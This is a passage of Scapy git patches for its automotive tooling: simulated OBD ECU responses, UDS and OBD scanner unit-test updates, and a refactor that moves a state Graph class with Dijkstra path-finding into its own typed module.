unit_and_scaling_id=28, test_value=0.0, min_limit=0.0, max_limit=10.0),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=132, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=133, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=134, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=135, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=64)/OBD_MID40(supported_mids=3221225473)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=65)/OBD_MIDXX(standardized_test_id=133, unit_and_scaling_id=22, test_value=720.0, min_limit=700.0, max_limit=6513.5)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=66)/OBD_MIDXX(standardized_test_id=144, unit_and_scaling_id=20, test_value=401, min_limit=0, max_limit=800)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=96)/OBD_MID60(supported_mids=1)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=71)/OBD_S07_PR(count=0)), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=0)/OBD_IID00(supported_iids=1430405120)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=10)/OBD_IID0A(ecu_names=[b'ECM\x00-EngineControl\x00\x00'], count=1)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=15)/Raw(load=b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00HM0876')])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=18)/Raw(load=b'\x01\x00\xd5')])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=2)/OBD_IID02(vehicle_identification_numbers=[b'WDD1xxxxxxxxxxx11'], count=1)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=4)/OBD_IID04(calibration_identifications=[b'282xxxxxxx300044', b'00090xxxxxx00031'], count=2)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=6)/OBD_IID06(calibration_verification_numbers=[b'\xf9\x10\xb9\xfb', b'&6"e'], count=2)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=8)/OBD_IID08(data=[9, 189, 8, 9, 0, 0, 8, 9, 0, 0, 22, 9, 0, 0, 0, 0, 8, 9, 0, 0], count=20)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=1, response_code=49)), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=10, response_code=49)), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=6, response_code=49)), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=8, response_code=17)), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=127)/OBD_NR(request_service_id=9, response_code=49))] + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=0)/OBD_PID00(supported_pids=3191777299)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=1)/OBD_PID01(mil=0, dtc_count=0, reserved1=0, continuous_tests_ready=0, reserved2=0, continuous_tests_supported=7, once_per_trip_tests_supported=225, once_per_trip_tests_ready=0)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=11)/OBD_PID0B(data=44)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=12)/OBD_PID0C(data=857.0)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=13)/OBD_PID0D(data=0)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=14)/OBD_PID0E(data=3.5)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=15)/OBD_PID0F(data=22.0)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=17)/OBD_PID11(data=14.51)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=19)/OBD_PID13(sensors_present=3)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=21)/OBD_PID15(outputVoltage=1.275, trim=99.219)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=28)/OBD_PID1C(data=6)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=3)/OBD_PID03(fuel_system1=2, fuel_system2=0)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=31)/OBD_PID1F(data=13)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=32)/OBD_PID20(supported_pids=2684465153)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=33)/OBD_PID21(data=0)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=35)/OBD_PID23(data=24910)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=4)/OBD_PID04(data=9.804)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=48)/OBD_PID30(data=19)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=49)/OBD_PID31(data=3587)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=5)/OBD_PID05(data=41.0)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=51)/OBD_PID33(data=97)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=52)/OBD_PID34(equivalence_ratio=1.001, current=128.004)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=6)/OBD_PID06(data=0.0)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=64)/OBD_PID40(supported_pids=244352000)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=69)/OBD_PID45(data=3.922)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=7)/OBD_PID07(data=-0.781)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=70)/OBD_PID46(data=20.0)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=71)/OBD_PID47(data=12.549)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=73)/OBD_PID49(data=5.49)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=76)/OBD_PID4C(data=3.922)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=81)/OBD_PID51(data=1)])), + EcuResponse(responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=86)/OBD_PID56(bank1=0.0)])), + EcuResponse(responses=OBD(service=67)/OBD_S03_PR(count=0)), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=0)/OBD_MID00(supported_mids=3221225473)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=1)/OBD_MIDXX(standardized_test_id=131, unit_and_scaling_id=4, test_value=0.0, min_limit=0.0, max_limit=1.0),OBD_S06_PR_Record(mid=1)/OBD_MIDXX(standardized_test_id=138, unit_and_scaling_id=132, test_value=0.996, min_limit=-32.768, max_limit=1.06),OBD_S06_PR_Record(mid=1)/OBD_MIDXX(standardized_test_id=139, unit_and_scaling_id=132, test_value=0.996, min_limit=0.94, max_limit=32.767)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=128)/OBD_MID80(supported_mids=1)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=160)/OBD_MIDA0(supported_mids=4160749568)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=161)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=162)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=162)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=2, min_limit=0, max_limit=65535)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=163)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=163)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=1, min_limit=0, max_limit=65535)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=164)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=164)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=1, min_limit=0, max_limit=65535)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=165)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=165)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=1, min_limit=0, max_limit=65535)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=2)/OBD_MIDXX(standardized_test_id=145, unit_and_scaling_id=177, test_value=3944, min_limit=900, max_limit=65534),OBD_S06_PR_Record(mid=2)/OBD_MIDXX(standardized_test_id=149, unit_and_scaling_id=10, test_value=764.696, min_limit=719.556, max_limit=7995.27),OBD_S06_PR_Record(mid=2)/OBD_MIDXX(standardized_test_id=150, unit_and_scaling_id=10, test_value=115.412, min_limit=0.0, max_limit=179.95)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=32)/OBD_MID20(supported_mids=2147485697)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=33)/OBD_MIDXX(standardized_test_id=132, unit_and_scaling_id=3, test_value=2.63, min_limit=1.0, max_limit=655.35)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=128, unit_and_scaling_id=28, test_value=32.42, min_limit=10.0, max_limit=655.35),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=129, unit_and_scaling_id=28, test_value=25.41, min_limit=10.0, max_limit=655.35),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=130, unit_and_scaling_id=28, test_value=0.21, min_limit=0.0, max_limit=10.0),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=131, unit_and_scaling_id=28, test_value=0.0, min_limit=0.0, max_limit=10.0),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=132, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=133, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=134, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=135, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=3)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=64)/OBD_MID40(supported_mids=3221225473)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=65)/OBD_MIDXX(standardized_test_id=133, unit_and_scaling_id=22, test_value=720.0, min_limit=700.0, max_limit=6513.5)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=66)/OBD_MIDXX(standardized_test_id=144, unit_and_scaling_id=20, test_value=401, min_limit=0, max_limit=800)])), + EcuResponse(responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=96)/OBD_MID60(supported_mids=1)])), + EcuResponse(responses=OBD(service=71)/OBD_S07_PR(count=0)), + EcuResponse(responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=0)/OBD_IID00(supported_iids=1430405120)])), + EcuResponse(responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=10)/OBD_IID0A(ecu_names=[b'ECM\x00-EngineControl\x00\x00'], count=1)])), + EcuResponse(responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=15)/Raw(load=b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00HM0876')])), + EcuResponse(responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=18)/Raw(load=b'\x01\x00\xd5')])), + EcuResponse(responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=2)/OBD_IID02(vehicle_identification_numbers=[b'WDD1xxxxxxxxxxx11'], count=1)])), + EcuResponse(responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=4)/OBD_IID04(calibration_identifications=[b'282xxxxxxx300044', b'00090xxxxxx00031'], count=2)])), + EcuResponse(responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=6)/OBD_IID06(calibration_verification_numbers=[b'\xf9\x10\xb9\xfb', b'&6"e'], count=2)])), + EcuResponse(responses=OBD(service=73)/OBD_S09_PR(data_records=[OBD_S09_PR_Record(iid=8)/OBD_IID08(data=[9, 189, 8, 9, 0, 0, 8, 9, 0, 0, 22, 9, 0, 0, 0, 0, 8, 9, 0, 0], count=20)])), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=1, response_code=49)), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=10, response_code=49)), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=6, response_code=49)), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=8, response_code=17)), + EcuResponse(responses=OBD(service=127)/OBD_NR(request_service_id=9, response_code=49))] + Simulate scanner diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index 6adda5555cc..5dc0c09d45a 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -12,6 +12,8 @@ load_contrib("automotive.uds", globals_dict=globals()) load_contrib("automotive.ecu", globals_dict=globals()) +from scapy.contrib.automotive.uds_ecu_states import * + = Check if positive response answers dsc = UDS(b'\x10') @@ -100,8 +102,9 @@ assert dscpr.diagnosticSessionType == 0x09 assert dscpr.sessionParameterRecord == b"beef" ecu = Ecu() +ecu.update(dsc) ecu.update(dscpr) -assert ecu.current_session == 9 +assert ecu.state.session == 9 = Check UDS_ER @@ -138,15 +141,13 @@ assert erpr.resetType == 0x04 assert erpr.powerDownTime == 0x10 ecu = Ecu() -ecu.current_security_level = 5 -ecu.current_session = 3 -ecu.communication_control = 4 - +ecu.state.security_level = 5 +ecu.state.session = 3 +ecu.state.communication_control = 4 +ecu.update(er) ecu.update(erpr) -assert ecu.current_session == 1 -assert ecu.current_security_level == 0 -assert ecu.communication_control == 0 +assert ecu.state.session == 1 = Check UDS_SA @@ -181,9 +182,9 @@ assert sapr.answers(sa) = Check UDS_SA -sa = UDS(b'\x27\x00c0ffee') +sa = UDS(b'\x27\x06c0ffee') assert sa.service == 0x27 -assert sa.securityAccessType == 0x0 +assert sa.securityAccessType == 0x6 assert sa.securityKey == b'c0ffee' @@ -194,8 +195,9 @@ assert sapr.service == 0x67 assert sapr.securityAccessType == 0x6 ecu = Ecu() +ecu.update(sa) ecu.update(sapr) -assert ecu.current_security_level == 6 +assert ecu.state.security_level == 6 = Check UDS_SA @@ -236,8 +238,9 @@ assert ccpr.service == 0x68 assert ccpr.controlType == 0x1 ecu = Ecu() +ecu.update(cc) ecu.update(ccpr) -assert ecu.communication_control == 1 +assert ecu.state.communication_control == 1 = Check UDS_TP @@ -801,7 +804,7 @@ rc = UDS(b'\x31\x03\xff\xee\xdd\xaa') assert rc.service == 0x31 assert rc.routineControlType == 3 assert rc.routineIdentifier == 0xffee -assert rc.routineControlOptionRecord == b'\xdd\xaa' +assert rc.load == b'\xdd\xaa' = Check UDS_RC @@ -809,7 +812,7 @@ rc = UDS(b'\x31\x03\xff\xee\xdd\xaa') assert rc.service == 0x31 assert rc.routineControlType == 3 assert rc.routineIdentifier == 0xffee -assert rc.routineControlOptionRecord == b'\xdd\xaa' +assert rc.load == b'\xdd\xaa' = Check UDS_RCPR @@ -818,7 +821,7 @@ rcpr = UDS(b'\x71\x03\xff\xee\xdd\xaa') assert rcpr.service == 0x71 assert rcpr.routineControlType == 3 assert rcpr.routineIdentifier == 0xffee -assert rcpr.routineStatusRecord == b'\xdd\xaa' +assert rcpr.load == b'\xdd\xaa' = Check UDS_RD diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index 4a68e341c66..550542e1855 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -74,7 +74,7 @@ drain_bus(iface0) s3 = OBD()/OBD_S03_PR(dtcs=[OBD_DTC()]) -example_responses = [EcuResponse(session=range(0, 255), security_level=0, responses=s3)] +example_responses = [EcuResponse(responses=s3)] with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu, \ new_can_socket0() as isocan2, ISOTPSocket(isocan2, 0x7e0, 0x7e8, basecls=OBD, padding=True) as tester: @@ -110,14 +110,14 @@ s1_pid0F = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID0F(data=50) # Create answers for 'supported PIDs scan' example_responses = \ - [EcuResponse(session=range(0, 255), security_level=0, responses=s3), - EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid00), - EcuResponse(session=range(0, 255), security_level=0, responses=s6_mid00), - EcuResponse(session=range(0, 255), security_level=0, responses=s8_tid00), - EcuResponse(session=range(0, 255), security_level=0, responses=s9_iid00), - EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid03), - EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid0B), - EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid0F)] + [EcuResponse(responses=s3), + EcuResponse(responses=s1_pid00), + EcuResponse(responses=s6_mid00), + EcuResponse(responses=s8_tid00), + EcuResponse(responses=s9_iid00), + EcuResponse(responses=s1_pid03), + EcuResponse(responses=s1_pid0B), + EcuResponse(responses=s1_pid0F)] @@ -155,14 +155,14 @@ s1_pid0F = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID0F(data=50) # Create answers for 'supported PIDs scan' example_responses = \ - [EcuResponse(session=range(0, 255), security_level=0, responses=s3), - EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid00), - EcuResponse(session=range(0, 255), security_level=0, responses=s6_mid00), - EcuResponse(session=range(0, 255), security_level=0, responses=s8_tid00), - EcuResponse(session=range(0, 255), security_level=0, responses=s9_iid00), - EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid03), - EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid0B), - EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid0F)] + [EcuResponse(responses=s3), + EcuResponse(responses=s1_pid00), + EcuResponse(responses=s6_mid00), + EcuResponse(responses=s8_tid00), + EcuResponse(responses=s9_iid00), + EcuResponse(responses=s1_pid03), + EcuResponse(responses=s1_pid0B), + EcuResponse(responses=s1_pid0F)] @@ -192,7 +192,7 @@ drain_bus(iface0) # Add unsupported PID s1_pid01 = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID01()]) -example_responses.append(EcuResponse(session=range(0, 255), security_level=0, responses=s1_pid01)) +example_responses.append(EcuResponse(responses=s1_pid01)) with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu, \ new_can_socket0() as isocan2, ISOTPSocket(isocan2, 0x7e0, 0x7e8, basecls=OBD, padding=True) as tester: From 99558be12d495f872bba8d06481aacd3d627e5d6 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 9 Mar 2021 09:32:58 +0100 Subject: [PATCH 0524/1632] Split #3054: Add independant Graph file, including typing and unit tests (#3128) --- .config/mypy/mypy_enabled.txt | 5 +- scapy/contrib/automotive/enumerator.py | 71 +---------- scapy/contrib/automotive/graph.py | 166 +++++++++++++++++++++++++ scapy/tools/automotive/obdscanner.py | 3 + test/contrib/automotive/enumerator.uts | 50 -------- test/contrib/automotive/graph.uts | 75 +++++++++++ 6 files changed, 250 insertions(+), 120 deletions(-) create mode 100644 scapy/contrib/automotive/graph.py create mode 100644 test/contrib/automotive/graph.uts diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index e7409599da1..e85cfc3d9d2 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -39,11 +39,12 @@ scapy/layers/l2.py # CONTRIB #scapy/contrib/http2.py # needs to be fixed scapy/contrib/roce.py +scapy/contrib/automotive/graph.py scapy/contrib/automotive/ecu.py +scapy/contrib/automotive/uds_ecu_states.py +scapy/contrib/automotive/uds_logging.py scapy/contrib/automotive/gm/gmlanutils.py scapy/contrib/automotive/gm/gmlan_ecu_states.py scapy/contrib/automotive/gm/gmlan_logging.py -scapy/contrib/automotive/uds_ecu_states.py -scapy/contrib/automotive/uds_logging.py scapy/contrib/automotive/bmw/hsfz.py scapy/contrib/automotive/doip.py diff --git a/scapy/contrib/automotive/enumerator.py b/scapy/contrib/automotive/enumerator.py index d9336413b5e..905952f86e2 100644 --- a/scapy/contrib/automotive/enumerator.py +++ b/scapy/contrib/automotive/enumerator.py @@ -12,72 +12,7 @@ from scapy.utils import make_lined_table, SingleConversationSocket import scapy.modules.six as six from scapy.contrib.automotive.ecu import EcuState - - -class Graph: - def __init__(self): - """ - self.edges is a dict of all possible next nodes - e.g. {'X': ['A', 'B', 'C', 'E'], ...} - self.weights has all the weights between two nodes, - with the two nodes as a tuple as the key - e.g. {('X', 'A'): 7, ('X', 'B'): 2, ...} - """ - self.edges = defaultdict(list) - self.weights = {} - - def add_edge(self, from_node, to_node, weight=1): - # Note: assumes edges are bi-directional - self.edges[from_node].append(to_node) - self.edges[to_node].append(from_node) - self.weights[(from_node, to_node)] = weight - self.weights[(to_node, from_node)] = weight - - @property - def nodes(self): - return self.edges.keys() - - @staticmethod - def dijsktra(graph, initial, end): - # shortest paths is a dict of nodes - # whose value is a tuple of (previous node, weight) - shortest_paths = {initial: (None, 0)} - current_node = initial - visited = set() - - while current_node != end: - visited.add(current_node) - destinations = graph.edges[current_node] - weight_to_current_node = shortest_paths[current_node][1] - - for next_node in destinations: - weight = \ - graph.weights[(current_node, next_node)] + \ - weight_to_current_node - if next_node not in shortest_paths: - shortest_paths[next_node] = (current_node, weight) - else: - current_shortest_weight = shortest_paths[next_node][1] - if current_shortest_weight > weight: - shortest_paths[next_node] = (current_node, weight) - - next_destinations = {node: shortest_paths[node] for node in - shortest_paths if node not in visited} - if not next_destinations: - return None - # next node is the destination with the lowest weight - current_node = min(next_destinations, - key=lambda k: next_destinations[k][1]) - - # Work back through destinations in shortest path - path = [] - while current_node is not None: - path.append(current_node) - next_node = shortest_paths[current_node][0] - current_node = next_node - # Reverse path - path.reverse() - return path +from scapy.contrib.automotive.graph import Graph class Enumerator(object): @@ -293,7 +228,7 @@ def __init__(self, socket, reset_handler=None, enumerators=None, **kwargs): self.enumerators = [e(self.socket) for e in self.default_enumerator_clss] # noqa: E501 self.enumerator_classes = [e.__class__ for e in self.enumerators] self.state_graph = Graph() - self.state_graph.add_edge(EcuState(), EcuState()) + self.state_graph.add_edge((EcuState(), EcuState())) self.configuration = \ {"dynamic_timeout": kwargs.pop("dynamic_timeout", False), "enumerator_classes": self.enumerator_classes, @@ -325,7 +260,7 @@ def dump(self, completed_only=True): "delay_state_change": self.configuration["delay_state_change"]} def get_state_paths(self): - paths = [Graph.dijsktra(self.state_graph, EcuState(), s) + paths = [Graph.dijkstra(self.state_graph, EcuState(), s) for s in self.state_graph.nodes if s != EcuState()] return sorted([p for p in paths if p is not None] + [[EcuState()]], key=lambda x: x[-1]) diff --git a/scapy/contrib/automotive/graph.py b/scapy/contrib/automotive/graph.py new file mode 100644 index 00000000000..3f6135027ae --- /dev/null +++ b/scapy/contrib/automotive/graph.py @@ -0,0 +1,166 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = Graph library for AutomotiveTestCaseExecutor +# scapy.contrib.status = library + +from collections import defaultdict + +from scapy.compat import Union, List, Optional, Dict, Tuple, Set, TYPE_CHECKING +from scapy.contrib.automotive.ecu import EcuState +from scapy.error import log_interactive + +_Edge = Tuple[EcuState, EcuState] + +if TYPE_CHECKING: + from scapy.contrib.automotive.enumerator import _TransitionTuple + + +class Graph(object): + """ + Helper object to store a directional Graph of EcuState objects. An edge in + this Graph is defined as Tuple of two EcuStates. A node is defined as + EcuState. + + self.edges is a dict of all possible next nodes + e.g. {'X': ['A', 'B', 'C', 'E'], ...} + + self.__transition_functions has all the transition_functions between + two nodes, with the two nodes as a tuple as the key + e.g. {('X', 'A'): 7, ('X', 'B'): 2, ...} + """ + def __init__(self): + # type: () -> None + self.edges = defaultdict(list) # type: Dict[EcuState, List[EcuState]] + self.__transition_functions = {} # type: Dict[_Edge, Optional["_TransitionTuple"]] # noqa: E501 + self.weights = {} # type: Dict[_Edge, int] + + def add_edge(self, edge, transition_function=None): + # type: (_Edge, Optional["_TransitionTuple"]) -> None + """ + Inserts new edge in directional graph + :param edge: edge from node to node + :param transition_function: tuple with enter and cleanup function + """ + self.edges[edge[0]].append(edge[1]) + self.weights[edge] = 1 + self.__transition_functions[edge] = transition_function + + def get_transition_tuple_for_edge(self, edge): + # type: (_Edge) -> Optional["_TransitionTuple"] # noqa: E501 + """ + Returns a TransitionTuple for an Edge, if available. + :param edge: Tuple of EcuStates + :return: According TransitionTuple or None + """ + return self.__transition_functions.get(edge, None) + + def downrate_edge(self, edge): + # type: (_Edge) -> None + """ + Increases the weight of an Edge + :param edge: Edge on which the weight has t obe increased + """ + try: + self.weights[edge] += 1 + except KeyError: + pass + + @property + def transition_functions(self): + # type: () -> Dict[_Edge, Optional["_TransitionTuple"]] + """ + Get the dict of all TransistionTuples + :return: + """ + return self.__transition_functions + + @property + def nodes(self): + # type: () -> Union[List[EcuState], Set[EcuState]] + """ + Get a set of all nodes in this Graph + :return: + """ + return set([n for _, p in self.edges.items() for n in p]) + + def render(self, filename="SystemStateGraph.gv", view=True): + # type: (str, bool) -> None + """ + Renders this Graph as PDF, if `graphviz` is installed. + + :param filename: A filename for the rendered PDF. + :param view: If True, rendered file will be opened. + """ + try: + from graphviz import Digraph + except ImportError: + log_interactive.info("Please install graphviz.") + return + + ps = Digraph(name="SystemStateGraph", + node_attr={"fillcolor": "lightgrey", + "style": "filled", + "shape": "box"}, + graph_attr={"concentrate": "true"}) + for n in self.nodes: + ps.node(str(n)) + + for e, f in self.__transition_functions.items(): + try: + desc = "" if f is None else f[1]["desc"] + except (AttributeError, KeyError): + desc = "" + ps.edge(str(e[0]), str(e[1]), label=desc) + + ps.render(filename, view=view) + + @staticmethod + def dijkstra(graph, initial, end): + # type: (Graph, EcuState, EcuState) -> 